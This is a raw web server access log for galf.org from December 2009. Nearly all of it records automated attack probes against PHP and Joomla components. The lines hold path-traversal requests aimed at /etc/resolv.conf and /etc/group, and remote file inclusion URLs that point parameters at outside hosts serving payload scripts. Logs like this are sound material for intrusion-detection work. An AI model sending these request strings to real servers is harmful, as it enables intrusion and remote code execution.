208.76.107.242 - - [27/Dec/2009:22:37:04 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:22:37:04 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:22:37:04 -0800] "GET /logs/access_090720.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:22:37:05 -0800] "GET /logs/access_090720.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:22:37:57 -0800] "GET /logs/access_091026.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:22:37:57 -0800] "GET /logs/access_091026.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:22:38:10 -0800] "GET /logs/access_090713.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:22:38:10 -0800] "GET /logs/access_090713.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:22:38:33 -0800] "GET /logs/access_090817.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:22:38:34 -0800] "GET /logs/access_090817.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:22:38:50 -0800] "GET /logs/access_090706.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:22:38:50 -0800] "GET /logs/access_090706.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:22:39:23 -0800] "GET /logs/access_090615.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:22:39:23 -0800] "GET /logs/access_090615.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:22:39:25 -0800] "GET /logs/access_090824.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:22:39:26 -0800] "GET /logs/access_090824.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:22:39:44 -0800] "GET /logs/access_090622.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:22:39:45 -0800] "GET /logs/access_090622.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:22:40:55 -0800] "GET /logs/access_090817.log%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:22:40:56 -0800] "GET /logs/access_090817.log%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:22:40:59 -0800] "GET /logs/access_090824.log%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:22:40:59 -0800] "GET /logs/access_090824.log%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
216.227.220.85 - - [27/Dec/2009:22:41:10 -0800] "GET /index.php?go=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
216.227.220.85 - - [27/Dec/2009:22:41:10 -0800] "GET /index.php?go=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
61.47.7.71 - - [27/Dec/2009:22:44:59 -0800] "GET /logs/access.log%20%20///include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
196.40.83.71 - - [27/Dec/2009:23:06:53 -0800] "GET //vwar/backup/errors.php?error=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
190.24.131.38 - - [27/Dec/2009:23:07:51 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://militarytattoo.lu/adminv3/files/id.txt???%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
190.24.131.38 - - [27/Dec/2009:23:07:51 -0800] "GET /logs/access.log/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://militarytattoo.lu/adminv3/files/id.txt???%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
190.24.131.38 - - [27/Dec/2009:23:07:51 -0800] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://militarytattoo.lu/adminv3/files/id.txt???%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
193.4.113.98 - - [27/Dec/2009:23:10:00 -0800] "GET /logs/access_091116.log/index.php?redir=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.4.113.98 - - [27/Dec/2009:23:10:00 -0800] "GET /logs/access_091116.log/index.php?redir=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.4.113.98 - - [27/Dec/2009:23:10:00 -0800] "GET /logs/index.php?redir=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.4.113.98 - - [27/Dec/2009:23:10:00 -0800] "GET /logs/index.php?redir=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.4.113.98 - - [27/Dec/2009:23:10:00 -0800] "GET /index.php?redir=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.4.113.98 - - [27/Dec/2009:23:10:01 -0800] "GET /logs/access_091116.log/index.php?redir=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.4.113.98 - - [27/Dec/2009:23:10:01 -0800] "GET /index.php?redir=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.4.113.98 - - [27/Dec/2009:23:10:01 -0800] "GET /logs/index.php?redir=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.4.113.98 - - [27/Dec/2009:23:10:03 -0800] "GET /index.php?redir=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.4.113.98 - - [27/Dec/2009:23:10:24 -0800] "GET /index.php?redir=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.4.113.98 - - [27/Dec/2009:23:10:24 -0800] "GET /logs/index.php?redir=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.4.113.98 - - [27/Dec/2009:23:10:25 -0800] "GET /logs/access_091116.log%20%20/index.php?redir=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.4.113.98 - - [27/Dec/2009:23:10:30 -0800] "GET /index.php?redir=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.4.113.98 - - [27/Dec/2009:23:10:30 -0800] "GET /logs/index.php?redir=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.4.113.98 - - [27/Dec/2009:23:10:31 -0800] "GET /index.php?redir=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.4.113.98 - - [27/Dec/2009:23:10:31 -0800] "GET /logs/access_091116.log%20%20/index.php?redir=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.4.113.98 - - [27/Dec/2009:23:10:32 -0800] "GET /logs/index.php?redir=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.4.113.98 - - [27/Dec/2009:23:10:33 -0800] "GET /logs/access_091116.log%20%20/index.php?redir=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.24.131.38 - - [27/Dec/2009:23:11:15 -0800] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://militarytattoo.lu/adminv3/files/id.txt???%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
190.24.131.38 - - [27/Dec/2009:23:11:15 -0800] "GET /logs/access_091221.log/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://militarytattoo.lu/adminv3/files/id.txt???%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
190.24.131.38 - - [27/Dec/2009:23:11:15 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://militarytattoo.lu/adminv3/files/id.txt???%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
193.4.113.98 - - [27/Dec/2009:23:12:54 -0800] "GET /home.php?x=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
193.4.113.98 - - [27/Dec/2009:23:12:56 -0800] "GET /logs/access.log%20%20/home.php?x=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
193.4.113.98 - - [27/Dec/2009:23:12:57 -0800] "GET /logs/home.php?x=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
193.4.113.98 - - [27/Dec/2009:23:12:58 -0800] "GET /home.php?x=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
193.4.113.98 - - [27/Dec/2009:23:12:58 -0800] "GET /home.php?x=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
193.4.113.98 - - [27/Dec/2009:23:12:58 -0800] "GET /logs/home.php?x=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
193.4.113.98 - - [27/Dec/2009:23:12:59 -0800] "GET /logs/access.log/home.php?x=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
193.4.113.98 - - [27/Dec/2009:23:12:59 -0800] "GET /logs/access.log%20%20/home.php?x=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
193.4.113.98 - - [27/Dec/2009:23:12:59 -0800] "GET /logs/home.php?x=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
190.24.131.38 - - [27/Dec/2009:23:13:01 -0800] "GET /logs/access_091221.log%20/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://militarytattoo.lu/adminv3/files/id.txt???%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
193.4.113.98 - - [27/Dec/2009:23:13:12 -0800] "GET /logs/access_090720.log%20%20/index.php?redir=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.4.113.98 - - [27/Dec/2009:23:13:12 -0800] "GET /logs/access_090720.log%20%20/index.php?redir=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.4.113.98 - - [27/Dec/2009:23:13:13 -0800] "GET /logs/access_090720.log%20%20/index.php?redir=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.4.113.98 - - [27/Dec/2009:23:13:54 -0800] "GET /logs/access.log%20%20/home.php?x=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
196.40.83.71 - - [27/Dec/2009:23:15:10 -0800] "GET //vwar/backup/errors.php?error=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "galf.org"
208.80.193.32 - - [27/Dec/2009:23:15:36 -0800] "GET /labia23portugues/index.htm&sa=x&oi=translate&resnum=45&ct=result HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; TUCOWS; Q312461; .NET CLR 1.1.4322)" "www.galf.org"
213.171.37.206 - - [27/Dec/2009:23:15:44 -0800] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://e-winiarze.nasze.org/components/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
213.171.37.206 - - [27/Dec/2009:23:15:44 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://e-winiarze.nasze.org/components/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
213.171.37.206 - - [27/Dec/2009:23:15:45 -0800] "GET /logs/access_091221.log%20/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://e-winiarze.nasze.org/components/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
193.4.113.98 - - [27/Dec/2009:23:16:05 -0800] "GET /logs/access.log/home.php?x=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
128.241.54.188 - - [27/Dec/2009:23:16:44 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.aigleboots.com//administrator/components/com_virtuemart/.../idx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
128.241.54.188 - - [27/Dec/2009:23:16:44 -0800] "GET /logs/access_090921.log%20%20//include/admin.lib.inc.php?site_path=http://www.aigleboots.com//administrator/components/com_virtuemart/.../idx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
128.241.54.188 - - [27/Dec/2009:23:16:44 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.aigleboots.com//administrator/components/com_virtuemart/.../idx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.4.113.98 - - [27/Dec/2009:23:17:25 -0800] "GET /logs/access.log/home.php?x=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.237.238.234 - - [27/Dec/2009:23:20:43 -0800] "GET /logs/access.log%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.237.238.234 - - [27/Dec/2009:23:20:43 -0800] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.237.238.234 - - [27/Dec/2009:23:20:43 -0800] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.237.238.234 - - [27/Dec/2009:23:21:52 -0800] "GET /logs/access.log%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.237.238.234 - - [27/Dec/2009:23:21:52 -0800] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.237.238.234 - - [27/Dec/2009:23:21:52 -0800] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
213.171.37.206 - - [27/Dec/2009:23:22:15 -0800] "GET /logs/access.log/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://e-winiarze.nasze.org/components/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "galf.org"
213.171.37.206 - - [27/Dec/2009:23:22:16 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://e-winiarze.nasze.org/components/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "galf.org"
213.171.37.206 - - [27/Dec/2009:23:22:19 -0800] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://e-winiarze.nasze.org/components/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "galf.org"
61.47.7.71 - - [27/Dec/2009:23:26:45 -0800] "GET ///appserv/main.php?appserv_root=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [27/Dec/2009:23:26:45 -0800] "GET /logs////appserv/main.php?appserv_root=http://190.12.77.105:83/fx29id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [27/Dec/2009:23:26:48 -0800] "GET /logs/access_090928.log%20%20////appserv/main.php?appserv_root=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.207.72 - - [27/Dec/2009:23:27:02 -0800] "GET /cendoc/?D=A HTTP/1.1" 200 526 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
213.171.37.206 - - [27/Dec/2009:23:27:16 -0800] "GET /logs/access_091221.log/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://e-winiarze.nasze.org/components/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
128.241.54.188 - - [27/Dec/2009:23:27:23 -0800] "GET /logs/access_090921.log//include/admin.lib.inc.php?site_path=http://www.aigleboots.com//administrator/components/com_virtuemart/.../idx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
128.241.54.188 - - [27/Dec/2009:23:27:28 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.aigleboots.com//administrator/components/com_virtuemart/.../idx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
128.241.54.188 - - [27/Dec/2009:23:27:28 -0800] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://www.aigleboots.com//administrator/components/com_virtuemart/.../idx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
128.241.54.188 - - [27/Dec/2009:23:27:28 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.aigleboots.com//administrator/components/com_virtuemart/.../idx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
61.47.7.71 - - [27/Dec/2009:23:28:44 -0800] "GET ///appserv/main.php?appserv_root=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [27/Dec/2009:23:28:44 -0800] "GET /logs/access_090928.log%20%20////appserv/main.php?appserv_root=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [27/Dec/2009:23:28:44 -0800] "GET /logs////appserv/main.php?appserv_root=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:23:32:25 -0800] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:23:32:25 -0800] "GET /logs/access_090720.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:23:32:25 -0800] "GET /logs/access_091123.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:23:32:25 -0800] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:23:32:25 -0800] "GET /logs/access_090720.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:23:32:26 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:23:32:26 -0800] "GET /logs/access_091123.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:23:32:26 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:23:33:08 -0800] "GET /logs/access_091026.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:23:33:09 -0800] "GET /logs/access_091026.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:23:33:21 -0800] "GET /logs/access_090713.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:23:33:21 -0800] "GET /logs/access_090713.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:23:33:42 -0800] "GET /logs/access_090817.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:23:33:42 -0800] "GET /logs/access_090817.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:23:33:56 -0800] "GET /logs/access_090706.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:23:33:57 -0800] "GET /logs/access_090706.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
